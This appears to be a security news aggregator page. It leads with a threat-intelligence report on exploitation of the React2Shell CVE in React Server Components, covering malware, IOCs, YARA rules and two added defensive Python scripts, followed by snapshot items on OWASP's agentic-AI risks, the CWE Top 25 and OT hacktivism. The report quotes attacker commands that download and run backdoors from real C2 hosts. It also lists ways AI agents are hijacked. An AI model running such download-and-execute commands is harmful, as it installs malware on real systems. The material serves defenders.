Aggregator
Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
Written by: Aragorn Tseng, Robert Weiner, Casey Charrier, Zander Work, Genevieve Stark, Austin Larsen
Introduction
On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) began observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups.
GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlap with activity previously reported by Huntress. These observed campaigns highlight the risk posed to organizations using unpatched versions of React and Next.js. This post details the observed exploitation chains and post-compromise behaviors and provides intelligence to assist defenders in identifying and remediating this threat.
For information on how Google is protecting customers and mitigation guidance, please refer to our companion blog post, Responding to CVE-2025-55182: Secure your React and Next.js workloads.
CVE-2025-55182 Overview
CVE-2025-55182 is an unauthenticated RCE vulnerability in React Server Components with a CVSS v3.x score of 10.0 and a CVSS v4 score of 9.3. The flaw allows unauthenticated attackers to send a single HTTP request that executes arbitrary code with the privileges of the user running the affected web server process.
GTIG considers CVE-2025-55182 to be a critical-risk vulnerability. Due to the use of React Server Components (RSC) in popular frameworks like Next.js, there are a significant number of exposed systems vulnerable to this issue. Exploitation potential is further increased by two factors: 1) there are a variety of valid payload formats and techniques, and 2) the mere presence of vulnerable packages on systems is often enough to permit exploitation.
The specific RSC packages that are vulnerable to CVE-2025-55182 are versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of:
- react-server-dom-webpack
- react-server-dom-parcel
- react-server-dom-turbopack
A large number of non-functional exploits, and consequently false information regarding viable payloads and exploitation logic, were widely distributed about this vulnerability during the initial days after disclosure. An example of a repository that started out wholly non-functional is this repository published by the GitHub user "ejpir", which, while initially claiming to be a legitimate functional exploit, has now updated their README to appropriately label their initial research claims as AI-generated and non-functional. While this repository still contains non-functional exploit code, it also now contains legitimate exploit code with Unicode obfuscation. While instances like this initially caused confusion across the industry, the number of legitimate exploits and their capabilities have massively expanded, including in-memory Next.js web shell deployment capabilities. There are also exploit samples, some entirely fake, some non-functional, and some with legitimate functionality, containing malware targeting security researchers. Researchers should validate all exploit code before trusting its capabilities or legitimacy.
Technical write-ups about this vulnerability have been published by reputable security firms, such as the one from Wiz. Researchers should refer to such trusted publications for up-to-date and accurate information when validating vulnerability details, exploit code, or published detections.
Additionally, there was a separate CVE issued for Next.js (CVE-2025-66478); however, this CVE has since been marked as a duplicate of CVE-2025-55182.
Observed Exploitation Activity
Since exploitation of CVE-2025-55182 began, GTIG has observed diverse payloads and post-exploitation behaviors across multiple regions and industries. In this blog post we focus on China-nexus espionage and financially motivated activity, but we have additionally observed Iran-nexus actors exploiting CVE-2025-55182.
China-Nexus Activity
As of Dec. 12, GTIG has identified multiple China-nexus threat clusters utilizing CVE-2025-55182 to compromise victim networks globally. Amazon Web Services (AWS) reporting indicates that China-nexus threat groups Earth Lamia and Jackpot Panda are also exploiting this vulnerability. GTIG tracks Earth Lamia as UNC5454. Currently, there are no public indicators available to assess a group relationship for Jackpot Panda.
MINOCAT
GTIG observed China-nexus espionage cluster UNC6600 exploiting the vulnerability to deliver the MINOCAT tunneler. The threat actor retrieved and executed a bash script used to create a hidden directory ($HOME/.systemd-utils), kill any processes named "ntpclient", download a MINOCAT binary, and establish persistence by creating a new cron job and a systemd service and by inserting malicious commands into the current user's shell config to execute MINOCAT whenever a new shell is started. MINOCAT is a 64-bit ELF executable for Linux that includes a custom "NSS" wrapper and an embedded, open-source Fast Reverse Proxy (FRP) client that handles the actual tunneling.
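An added example (not GTIG tooling) of a host sweep for the persistence described above: it enumerates home directories from /etc/passwd, so service accounts that run the web server are covered, then looks for the hidden directory and for references to it in shell configs, systemd units and crontabs. It assumes the persistence entries reference the hidden directory path, which the post does not state, and the unit and cron locations searched are common Linux defaults.

```python
import os
import re
import sys

HIDDEN_DIR = ".systemd-utils"   # hidden directory name reported in the post
# Assumption: common shell start-up files; the post names $HOME/.bashrc.
RC_FILES = (".bashrc", ".bash_profile", ".profile", ".zshrc")
# Assumption: persistence entries mention the hidden directory path.
MARKER = re.compile(re.escape(HIDDEN_DIR))


def homes_from_passwd(root):
    """Home directories listed in <root>/etc/passwd that exist on disk."""
    homes = set()
    try:
        with open(os.path.join(root, "etc/passwd"), errors="replace") as fh:
            for line in fh:
                fields = line.rstrip("\n").split(":")
                if len(fields) >= 7 and fields[5].startswith("/"):
                    homes.add(os.path.join(root, fields[5].lstrip("/")))
    except OSError:
        pass
    return sorted(h for h in homes if os.path.isdir(h))


def matching_lines(path):
    """(line number, text) for every line in path that matches MARKER."""
    hits = []
    try:
        with open(path, errors="replace") as fh:
            for number, line in enumerate(fh, 1):
                if MARKER.search(line):
                    hits.append((number, line.strip()))
    except OSError:
        pass  # missing or unreadable file: nothing to report
    return hits


def files_in(directory, suffix=""):
    """Regular files directly inside directory whose names end with suffix."""
    try:
        names = sorted(os.listdir(directory))
    except OSError:
        return []
    paths = (os.path.join(directory, n) for n in names if n.endswith(suffix))
    return [p for p in paths if os.path.isfile(p)]


def hunt(root="/"):
    """Return (kind, location, detail) findings for a live or mounted root."""
    findings = []
    candidates = []  # (kind, file) pairs to search for the marker
    for home in homes_from_passwd(root):
        hidden = os.path.join(home, HIDDEN_DIR)
        if os.path.isdir(hidden):
            listing = ", ".join(sorted(os.listdir(hidden)))
            findings.append(("hidden-dir", hidden, listing))
        candidates += [("shell-rc", os.path.join(home, rc)) for rc in RC_FILES]
        user_units = os.path.join(home, ".config/systemd/user")
        candidates += [("systemd-unit", p) for p in files_in(user_units, ".service")]
    system_units = os.path.join(root, "etc/systemd/system")
    candidates += [("systemd-unit", p) for p in files_in(system_units, ".service")]
    for spool in ("var/spool/cron/crontabs", "var/spool/cron"):
        candidates += [("cron", p) for p in files_in(os.path.join(root, spool))]
    for kind, path in candidates:
        for number, text in matching_lines(path):
            findings.append((kind, f"{path}:{number}", text))
    return findings


if __name__ == "__main__":
    for kind, location, detail in hunt(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(f"[{kind}] {location}: {detail}")
```

Pass the mount point of a disk image as the first argument to sweep it offline; reading the cron spool on a live host normally requires root.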
SNOWLIGHT
In separate incidents, suspected China-nexus threat actor UNC6586 exploited the vulnerability to execute a command using cURL or wget to retrieve a script that then downloaded and executed a SNOWLIGHT downloader payload (7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a). SNOWLIGHT is a component of VSHELL, a publicly available multi-platform backdoor written in Go, which has been used by threat actors of varying motivations. GTIG observed SNOWLIGHT making HTTP GET requests to C2 infrastructure (e.g., reactcdn.windowserrorapis[.]com) to retrieve additional payloads masquerading as legitimate files.
curl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com&p=443&t=tcp&a=l64&stage=true -o <filename>
Figure 1: cURL command executed to fetch SNOWLIGHT payload
COMPOOD
GTIG also observed multiple incidents in which threat actor UNC6588 exploited CVE-2025-55182, then ran a script that used wget to download a COMPOOD backdoor payload. The script then executed the COMPOOD sample, which masqueraded as Vim. GTIG did not observe any significant follow-on activity, and this threat actor's motivations are currently unknown.
wget http://45.76.155[.]14/vim -O /tmp/vim
/tmp/vim "/usr/lib/polkit-1/polkitd --no-debug"
Figure 2: COMPOOD downloaded via wget and executed
COMPOOD has historically been linked to suspected China-nexus espionage activity. In 2022, GTIG observed COMPOOD in incidents involving a suspected China-nexus espionage actor, and we also observed samples uploaded to VirusTotal from Taiwan, Vietnam, and China.
HISONIC
Another China-nexus actor, UNC6603, deployed an updated version of the HISONIC backdoor. HISONIC is a Go-based implant that utilizes legitimate cloud services, such as Cloudflare Pages and GitLab, to retrieve its encrypted configuration. This technique allows the actor to blend malicious traffic with legitimate network activity. In this instance, the actor embedded an XOR-encoded configuration for the HISONIC backdoor delimited between two markers, "115e1fc47977812" to denote the start of the configuration and "725166234cf88gxx" to mark the end. Telemetry indicates this actor is targeting cloud infrastructure, specifically AWS and Alibaba Cloud instances, within the Asia Pacific (APAC) region.
<version>115e1fc47977812.....REDACTED.....725166234cf88gxx</version>
Figure 3: HISONIC markers denoting configuration
ANGRYREBEL.LINUX
Finally, we also observed a China-nexus actor, UNC6595, exploiting the vulnerability to deploy ANGRYREBEL.LINUX. The threat actor uses an installation script (b.sh) that attempts to evade detection by masquerading the malware as the legitimate OpenSSH daemon (sshd) within the /etc/ directory, rather than its standard location. The actor also employs timestomping to alter file timestamps and executes anti-forensics commands, such as clearing the shell history (history -c). Telemetry indicates this cluster is primarily targeting infrastructure hosted on international Virtual Private Servers (VPS).
Financially Motivated Activity
Threat actors that monetize access via cryptomining are often among the first to exploit newly disclosed vulnerabilities. GTIG observed multiple incidents, starting on Dec. 5, in which threat actors exploited CVE-2025-55182 and deployed XMRig for illicit cryptocurrency mining. In one observed chain, the actor downloaded a shell script named "sex.sh," which downloads and executes the XMRIG cryptocurrency miner from GitHub. The script also attempts to establish persistence for the miner via a new systemd service called "system-update-service."
GTIG has also observed numerous discussions regarding CVE-2025-55182 in underground forums, including threads in which threat actors have shared links to scanning tools, proof-of-concept (PoC) code, and their experiences using these tools.
Outlook and Implications
After the disclosure of high-visibility, critical vulnerabilities, it is common for affected products to undergo a period of increased scrutiny, resulting in a swift but temporary increase in the number of vulnerabilities discovered. Since the disclosure of CVE-2025-55182, three additional React vulnerabilities have been disclosed: CVE-2025-55183, CVE-2025-55184, and CVE-2025-67779. In this case, two of these follow-on vulnerabilities have relatively limited impacts (restricted information disclosure and causing a denial-of-service (DoS) condition). The third vulnerability (CVE-2025-67779) also causes a DoS condition, as it arose due to an incomplete patch for CVE-2025-55184.
Recommendations
Organizations utilizing React or Next.js should take the following actions immediately:
- Patch Immediately:
  - To prevent remote code execution due to CVE-2025-55182, patch vulnerable React Server Components to at least 19.0.1, 19.1.2, or 19.2.1, depending on your vulnerable version. Patching to 19.2.2 or 19.2.3 will also prevent the potential for remote code execution.
  - To prevent the information disclosure impacts due to CVE-2025-55183, patch vulnerable React Server Components to at least 19.2.2.
  - To prevent DoS impacts due to CVE-2025-55184 and CVE-2025-67779, patch vulnerable React Server Components to 19.2.3. The 19.2.2 patch was found to be insufficient in preventing DoS impacts.
- Deploy WAF Rules: Google has rolled out a Cloud Armor web application firewall (WAF) rule designed to detect and block exploitation attempts related to this vulnerability. We recommend deploying this rule as a temporary mitigation while your vulnerability management program patches and verifies all vulnerable instances.
- Audit Dependencies: Determine if vulnerable React Server Components are included as a dependency in other applications within your environment.
- Monitor Network Traffic: Review logs for outbound connections to the indicators of compromise (IOCs) listed below, particularly wget or cURL commands initiated by web server processes.
- Hunt for Compromise: Look for the creation of hidden directories like $HOME/.systemd-utils, the unauthorized termination of processes such as ntpclient, and the injection of malicious execution logic into shell configuration files like $HOME/.bashrc.
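An added example (not GTIG's or the React project's code) of the patch and dependency audit steps above: it walks an npm package-lock.json, including nested copies pulled in by other packages, and compares each of the three RSC packages with the versions this post names. The sample lockfile is constructed, and because the post gives only 19.2.2 and 19.2.3 as targets for the follow-on CVEs, 19.0.x and 19.1.x installs are reported as below those releases rather than as confirmed vulnerable.

```python
import json
import re
import sys

# Package names and version numbers are the ones listed in this post.
RSC_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}
# Assumption: "19.0" in the post means release 19.0.0.
RCE_VULNERABLE = {(19, 0, 0), (19, 1, 0), (19, 1, 1), (19, 2, 0)}
INFO_FIXED = (19, 2, 2)   # CVE-2025-55183
DOS_FIXED = (19, 2, 3)    # CVE-2025-55184 and CVE-2025-67779
RELEASE = re.compile(r"^(\d+)\.(\d+)\.(\d+)$")

# Constructed sample in lockfileVersion 3 layout ("some-framework" is made up).
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.1.1"},
        "node_modules/react-server-dom-parcel": {"version": "19.2.3"},
        "node_modules/some-framework/node_modules/react-server-dom-turbopack":
            {"version": "19.2.1"},
    },
}


def classify(version_text):
    """Return the list of issues for one installed RSC package version."""
    match = RELEASE.match(version_text)
    if not match:
        # Pre-release, canary or missing version: the post does not cover these.
        return ["review: not a plain X.Y.Z release"]
    version = tuple(int(g) for g in match.groups())
    issues = []
    if version in RCE_VULNERABLE:
        issues.append("CVE-2025-55182 (RCE): listed vulnerable version")
    if (19, 0, 0) <= version < INFO_FIXED:
        issues.append("below 19.2.2 (CVE-2025-55183 information disclosure)")
    if (19, 0, 0) <= version < DOS_FIXED:
        issues.append("below 19.2.3 (CVE-2025-55184, CVE-2025-67779 DoS)")
    return issues


def iter_installed(lock):
    """Yield (location, name, version) for every package in the lockfile."""
    packages = lock.get("packages")
    if packages:  # lockfileVersion 2 and 3: flat map keyed by install path
        for path, meta in packages.items():
            if "node_modules/" in path:  # skips the root project and workspaces
                name = path.rsplit("node_modules/", 1)[1]
                yield path, name, meta.get("version", "")
        return
    # lockfileVersion 1: nested "dependencies" trees
    stack = [("", lock.get("dependencies", {}))]
    while stack:
        prefix, deps = stack.pop()
        for name, meta in deps.items():
            where = f"{prefix}node_modules/{name}"
            yield where, name, meta.get("version", "")
            stack.append((where + "/", meta.get("dependencies", {})))


def audit_lockfile(lock):
    """Return findings for RSC packages that have at least one issue."""
    findings = []
    for where, name, version in iter_installed(lock):
        if name in RSC_PACKAGES:
            issues = classify(version)
            if issues:
                findings.append({"path": where, "package": name,
                                 "version": version, "issues": issues})
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            lock = json.load(fh)
    else:
        lock = SAMPLE_LOCK
    for finding in audit_lockfile(lock):
        print(f'{finding["path"]} {finding["version"]}')
        for issue in finding["issues"]:
            print(f"  - {issue}")
```

A lockfile lists only packages installed by name; a copy bundled inside another package's own files does not appear in it and has to be found by inspecting the installed tree.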
To assist defenders in hunting for this activity, we have included IOCs for the threats described in this blog post. A broader subset of related indicators is available in a Google Threat Intelligence Collection of IOCs available for registered users.
| Indicator | Type | Description |
| --- | --- | --- |
| reactcdn.windowserrorapis[.]com | Domain | SNOWLIGHT C2 and Staging Server |
| 82.163.22[.]139 | IP Address | SNOWLIGHT C2 Server |
| 216.158.232[.]43 | IP Address | Staging server for sex.sh script |
| 45.76.155[.]14 | IP Address | COMPOOD C2 and Payload Staging Server |
| df3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540 | SHA256 | HISONIC sample |
| 92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3 | SHA256 | HISONIC sample |
| 0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696 | SHA256 | ANGRYREBEL.LINUX sample |
| 13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274 | SHA256 | XMRIG Downloader Script (filename: sex.sh) |
| 7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a | SHA256 | SNOWLIGHT sample (filename: linux_amd64) |
| 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273 | SHA256 | MINOCAT sample |
YARA Rules
MINOCAT
rule G_APT_Tunneler_MINOCAT_1 {
    meta:
        author = "Google Threat Intelligence Group (GTIG)"
        date_modified = "2025-12-10"
        rev = "1"
        md5 = "533585eb6a8a4aad2ad09bbf272eb45b"
    strings:
        $magic = { 7F 45 4C 46 }
        $decrypt_func = { 48 85 F6 0F 94 C1 48 85 D2 0F 94 C0 08 C1 0F 85 }
        $xor_func = { 4D 85 C0 53 49 89 D2 74 57 41 8B 18 48 85 FF 74 }
        $frp_str1 = "libxf-2.9.644/main.c"
        $frp_str2 = "xfrp login response: run_id: [%s], version: [%s]"
        $frp_str3 = "cannot found run ID, it should inited when login!"
        $frp_str4 = "new work connection request run_id marshal failed!"
        $telnet_str1 = "Starting telnetd on port %d\n"
        $telnet_str2 = "No login shell found at %s\n"
        $key = "bigeelaminoacow"
    condition:
        $magic at 0 and (1 of ($decrypt_func, $xor_func)) and (2 of ($frp_str*)) and (1 of ($telnet_str*)) and $key
}
COMPOOD
rule G_Backdoor_COMPOOD_1 {
    meta:
        author = "Google Threat Intelligence Group (GTIG)"
        date_modified = "2025-12-11"
        rev = "1"
        md5 = "d3e7b234cf76286c425d987818da3304"
    strings:
        $strings_1 = "ShellLinux.Shell"
        $strings_2 = "ShellLinux.Exec_shell"
        $strings_3 = "ProcessLinux.sendBody"
        $strings_4 = "ProcessLinux.ProcessTask"
        $strings_5 = "socket5Quick.StopProxy"
        $strings_6 = "httpAndTcp"
        $strings_7 = "clean.readFile"
        $strings_8 = "/sys/kernel/mm/transparent_hugepage/hpage_pmd_size"
        $strings_9 = "/proc/self/auxv"
        $strings_10 = "/dev/urandom"
        $strings_11 = "client finished"
        $strings_12 = "github.com/creack/pty.Start"
    condition:
        uint32(0) == 0x464C457f and 8 of ($strings_*)
}
SNOWLIGHT
rule G_Hunting_Downloader_SNOWLIGHT_1 {
    meta:
        author = "Google Threat Intelligence Group (GTIG)"
        date_created = "2025-03-25"
        date_modified = "2025-03-25"
        md5 = "3a7b89429f768fdd799ca40052205dd4"
        rev = 1
    strings:
        $str1 = "rm -rf $v"
        $str2 = "&t=tcp&a="
        $str3 = "&stage=true"
        $str4 = "export PATH=$PATH:$(pwd)"
        $str5 = "curl"
        $str6 = "wget"
        $str7 = "python -c 'import urllib"
    condition:
        all of them and filesize < 5KB
}
Are Trade Concerns Trumping US Cybersecurity?
Cybersecurity Snapshot: OWASP Ranks Top Agentic AI App Risks, as CISA Lists Most Dangerous Software Flaws
Check out the most critical threats to agentic AI applications, and then dive into the worst software weaknesses of 2025. Plus, learn about pro-Russia hacktivists’ attacks against critical infrastructure; AI governance best practices for boards; and NCSC’s updated security-certificate guidance.
Key takeaways
- OWASP released its inaugural list of top 10 risks for agentic AI, providing a critical framework to help organizations secure autonomous AI agents against unique threats like goal hijacking and tool misuse.
- CISA and MITRE published the 2025 Top 25 Most Dangerous Software Weaknesses, a list that application developers, cyber pros and risk managers can use to make more informed software-security decisions.
- A joint international advisory warns that pro-Russia hacktivist groups are aggressively targeting global critical infrastructure sectors using unsophisticated, opportunistic tactics to exploit operational technology (OT) systems.
Here are five things you need to know for the week ending December 12.
1 - OWASP releases Top 10 list for agentic AI security risks
If your organization has started using agentic AI tools – autonomous agents that can plan, execute workflows and make decisions with limited or no human oversight – your cyber team now has a new resource.
This week, the Open Worldwide Application Security Project (OWASP) released its "OWASP Top 10 for Agentic Applications 2026," whose goal is to help organizations identify and mitigate the unique risks associated with these autonomous AI systems.
"Companies are already exposed to agentic AI attacks - often without realizing that agents are running in their environments," Keren Katz, co-lead for OWASP's Top 10 for Agentic AI Applications and senior group manager of AI security at Tenable, said in a statement.
"While the threat is already here, the information available about this new attack vector is overwhelming. Effectively protecting a company against agentic AI requires not only strong security intuition but also a deep understanding of how AI agents fundamentally operate," Katz added.
Unlike standard generative AI, agentic AI systems can take direct action, coordinate with other agents and make decisions with limited human intervention. This shift creates unique vulnerabilities.
Here are OWASP’s top 10 risks for agentic AI applications:
- Agent goal hijack, which refers to attackers manipulating an AI agent's core objectives, turning helpful assistants into potential threats
- Tool misuse and exploitation, where AI agents may be tricked into misusing legitimate digital tools for destructive purposes or unauthorized actions
- Identity and privilege abuse, a scenario in which an AI agent's credentials are compromised or mismanaged, causing it to operate far beyond its intended scope
- Agentic supply chain vulnerabilities, which allow attackers to compromise the third-party components, libraries or datasets an AI agent relies on to function, poisoning its runtime environment
- Unexpected code execution, where the reliance on natural language to control AI agent actions opens new avenues for attackers to trick systems into running malicious code on the host
- Memory and context poisoning, in which malicious actors can corrupt an agent's long-term memory to influence future behavior
- Insecure inter-agent communication, where without proper verification, attackers spoof or intercept messages exchanged between agents, misdirecting entire clusters of autonomous systems.
- Cascading failures, which refers to how a single error or false signal in one AI agent can propagate through interlinked agents, amplifying the damage across interconnected systems.
- Human-agent trust exploitation, a scenario where agents can generate polished, confident-sounding explanations that mislead human operators into approving dangerous or erroneous actions
- Rogue agents, which are compromised AI agents that exhibit misalignment or take self-directed actions that conflict with their original purpose
(Source: "OWASP Top 10 for Agentic Applications 2026" report from OWASP, December 2025)
Developed with input from over 100 industry experts, this guide serves as a benchmark for securing the next generation of autonomous AI technologies.
“These are not theoretical risks. They are the lived experience of the first generation of agentic adopters-and they reveal a simple truth: Once AI began taking actions, the nature of security changed forever,” John Sotiropoulos, OWASP GenAI Security Project Board Member & Agentic Security Initiative Co-lead, wrote in a blog post.
“The Agentic Top 10 distills this new reality into a framework the world can use with actionable mitigations and new architectural blueprints,” he added.
For more information about agentic AI security, check out these Tenable blogs:
- “Agentic AI Security: Keep Your Cyber Hygiene Failures from Becoming a Global Breach”
- “A Practical Defense Against AI-led Attacks”
- “Microsoft Copilot Studio Security Risk: How Simple Prompt Injection Leaked Credit Cards and Booked a $0 Trip”
- “Frequently Asked Questions About Model Context Protocol (MCP) and Integrating with AI for Agentic Applications”
- “AI Security: Web Flaws Resurface in Rush to Use MCP Servers”
The list of the most severe and prevalent software weaknesses is out, and whether you’re a cyber pro, a developer or a risk manager, these insights can help you make better informed security decisions next year.
Published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and MITRE this week, the "2025 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses" features familiar foes like cross-site scripting (XSS), as well as some new ones.
So how can your team use this list? CISA and MITRE suggest that it can help you cut down on vulnerabilities by adopting development lifecycle changes and making safer architectural decisions.
You can also lower costs by eradicating weaknesses early, which lets you reduce remediation and incident response. The list, the agencies say, can also help product teams identify weaknesses to avoid, as they practice secure-by-design development.
Here’s the full list of the most critical software weaknesses attackers exploit:
| # | Weakness Name | CWE ID | CVEs in KEV | Rank Last Year |
| --- | --- | --- | --- | --- |
| 1 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | CWE-79 | 7 | 1 |
| 2 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') | CWE-89 | 4 | 3 (up 1) |
| 3 | Cross-Site Request Forgery (CSRF) | CWE-352 | 0 | 4 (up 1) |
| 4 | Missing Authorization | CWE-862 | 0 | 9 (up 5) |
| 5 | Out-of-bounds Write | CWE-787 | 12 | 2 (down 3) |
| 6 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') | CWE-22 | 10 | 5 (down 1) |
| 7 | Use After Free | CWE-416 | 14 | 8 (up 1) |
| 8 | Out-of-bounds Read | CWE-125 | 3 | 6 (down 2) |
| 9 | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | CWE-78 | 20 | 7 (down 2) |
| 10 | Improper Control of Generation of Code ('Code Injection') | CWE-94 | 7 | 11 (up 1) |
| 11 | Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') | CWE-120 | 0 | N/A |
| 12 | Unrestricted Upload of File with Dangerous Type | CWE-434 | 4 | 10 (down 2) |
| 13 | NULL Pointer Dereference | CWE-476 | 0 | 21 (up 8) |
| 14 | Stack-based Buffer Overflow | CWE-121 | 4 | N/A |
| 15 | Deserialization of Untrusted Data | CWE-502 | 11 | 16 (up 1) |
| 16 | Heap-based Buffer Overflow | CWE-122 | 6 | N/A |
| 17 | Incorrect Authorization | CWE-863 | 4 | 18 (up 1) |
| 18 | Improper Input Validation | CWE-20 | 2 | 12 (down 6) |
| 19 | Improper Access Control | CWE-284 | 1 | N/A |
| 20 | Exposure of Sensitive Information to an Unauthorized Actor | CWE-200 | 1 | 17 (down 3) |
| 21 | Missing Authentication for Critical Function | CWE-306 | 11 | 25 (up 4) |
| 22 | Server-Side Request Forgery (SSRF) | CWE-918 | 0 | 19 (down 3) |
| 23 | Improper Neutralization of Special Elements used in a Command ('Command Injection') | CWE-77 | 2 | 13 (down 10) |
| 24 | Authorization Bypass Through User-Controlled Key | CWE-639 | 0 | 30 (up 6) |
| 25 | Allocation of Resources Without Limits or Throttling | CWE-770 | 0 | 26 (up 1) |

“CISA and MITRE encourage organizations to review this list and use it to inform their respective software security strategies,” read a CISA statement.
For more information about software security:
- “OWASP Top Ten Web Application Security Risks” (OWASP)
- “12 key application security best practices” (TechTarget)
- “What is software security and why is it important?” (IEEE)
- “New UK Security Guidelines Aim to Reshape Software Development” (DarkReading)
- “AI-Powered DevSecOps: Navigating Automation, Risk and Compliance in a Zero-Trust World” (DevOps.com)
Critical infrastructure organizations, pay attention.
Hacktivist groups acting on behalf of the Russian government are targeting global critical infrastructure sectors, including energy; water systems; and food and agriculture.
The warning comes via the advisory “Opportunistic Pro-Russia Hacktivists Attack US and Global Critical Infrastructure,” jointly published this week by a group of multi-national cybersecurity and law enforcement agencies, including CISA.
Groups such as the Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16) and Sector16 are leveraging opportunistic methods to infiltrate operational technology (OT) networks, often gaining access through insecure, internet-facing virtual network computing (VNC) connections.
“The pro-Russia hacktivist groups highlighted in this advisory have demonstrated intent and capability to inflict tangible harm on vulnerable systems,” CISA Executive Assistant Director for Cybersecurity Nick Andersen said in a statement.
While these groups generally lack the sophistication of state-sponsored advanced persistent threats (APTs), their actions can still cause significant disruption. By exploiting weak security controls, such as default passwords and exposed human-machine interfaces (HMIs), they manipulate industrial control systems.
“The threat actors' intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate," the advisory reads. Yet, the attacks have had operational impacts like "loss of view" for system operators and potential physical damage to equipment.
To mitigate these risks, the authoring agencies recommend that critical infrastructure organizations take immediate action to harden their OT environments, including:
- Reduce internet exposure: Disconnect OT assets from the public-facing internet wherever possible. If remote access is necessary, use secure methods like VPNs.
- Strengthen authentication: Implement robust multifactor authentication (MFA) for all access to OT networks and devices. Avoid using default passwords.
- Improve asset management: Adopt mature asset management processes to map data flows and identify all access points within the OT environment.
- Limit remote access: Restrict VNC and other remote access services to only authorized users and essential operations.
CISA is also calling on OT device manufacturers to adopt secure-by-design principles in order to build security into their products from the start.
For more information about OT security, check out these Tenable resources:
- “Mind the Gap: A Roadmap to IT/OT Alignment” (white paper)
- “Unlock Advanced IoT Visibility in your OT Environment Security” (on-demand webinar)
- “Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk” (white paper)
- “Fortifying Your OT Environment: Vulnerability and Risk Mitigation Strategies” (on-demand webinar)
- “Identity Security Is the Missing Link To Combatting Advanced OT Threats” (blog)
Is your board treating AI as just another tech trend or as the existential shift it truly is?
A new McKinsey report, "The AI reckoning: How boards can evolve," argues that while 88% of organizations use AI, board governance is lagging dangerously behind.
To bridge this gap, directors must stop viewing AI solely through a technological lens and start understanding it as a catalyst that fundamentally reshapes competitive dynamics.
The report identifies four distinct AI postures for companies:
- Business pioneers, which position AI at their strategy’s core
- Internal transformers, where AI underpins operations
- Functional reinventors, which leverage AI to sharpen workflows
- Pragmatic adopters, which use AI for specific applications
Further, it outlines governance actions boards should take, including:
- Align on AI posture: Regularly review how AI fits into the company's strategic ambition to ensure that its stance reflects current realities.
- Clarify oversight ownership: Explicitly define which AI topics belong to the full board, which sit with committees and which remain with management to prevent accountability gaps.
- Codify a governance framework: Establish clear project-scaling rules, risk thresholds, vendor guardrails, and escalation triggers to guide decision-making.
- Build AI fluency: Directors need not be data scientists, but they must understand how AI creates specific risks and opportunities for their business.
"The rules, risks, and expectations related to AI are evolving rapidly, and boards cannot assume today’s practices are sufficient to meet the new challenges and opportunities," reads the report.
For more information about AI governance and oversight:
- “AI in Cybersecurity: Governance and Risk Quantification in the Boardroom” (Fair Institute)
- “Security for AI: A Practical Guide to Enforcing Your AI Acceptable Use Policy” (Tenable)
- “Governance of AI: A Critical Imperative for Today’s Boards" (Harvard Law School)
- “6 Best Practices for Implementing Commonly Available AI Governance Frameworks" (CDO Magazine)
- “Implementing AI Governance" (National Association of Corporate Directors)
Is your organization ready for the shift toward shorter certificate lifetimes and automated management?
That’s a key topic in the U.K. National Cyber Security Centre’s (NCSC) updated guide "Provisioning and managing certificates in the Web PKI," published this week.
It replaces previous NCSC guidance to reflect the evolving landscape of the web public key infrastructure (PKI). The NCSC highlights the need for organizations to shift away from manual management to reduce human error and to prepare for a future where certificates expire much faster.
The guidance aligns with recent NCSC advice on external attack surface management (EASM) and offers several key recommendations, including:
- Use automated certificate provisioning: Adopt automated protocols like ACME to reduce the burden of manual management and prevent expiration due to human error.
- Prepare for shorter validity periods: Recognize that the ecosystem is moving toward shorter certificate lifecycles.
- Monitor issuance and renewal: Maintain awareness of which certificates are in use and utilize certificate transparency (CT) logs to detect unexpected issuance.
- Avoid wildcard certificates: Limit the use of wildcard certificates to reduce the impact if a private key is compromised.
- Prefer domain validation: Use domain validation (DV) certificates for all use cases, as browsers now treat them as equivalent to organization validation (OV) and extended validation (EV) certificates.
"We will be producing more substantial revisions to our TLS and IPsec guidance in the near future, introducing additional recommended profiles / cipher suite preferences that include post-quantum cryptography, as the relevant protocol standards are finalised," reads a complementary NCSC blog.
New AiTM Attack Campaign That Bypasses MFA Targeting Microsoft 365 and Okta Users
A sophisticated phishing campaign has emerged that successfully bypasses the multi-factor authentication protecting Microsoft 365 and Okta users, representing a serious threat to organizations relying on these platforms for identity management. The campaign, discovered in early December 2025, demonstrates advanced knowledge of authentication flows. This campaign targets companies across multiple industries through carefully crafted phishing emails […]
The post New AiTM Attack Campaign That Bypasses MFA Targeting Microsoft 365 and Okta Users appeared first on Cyber Security News.
ImmuniWeb enhances AI vulnerability testing and compliance reporting
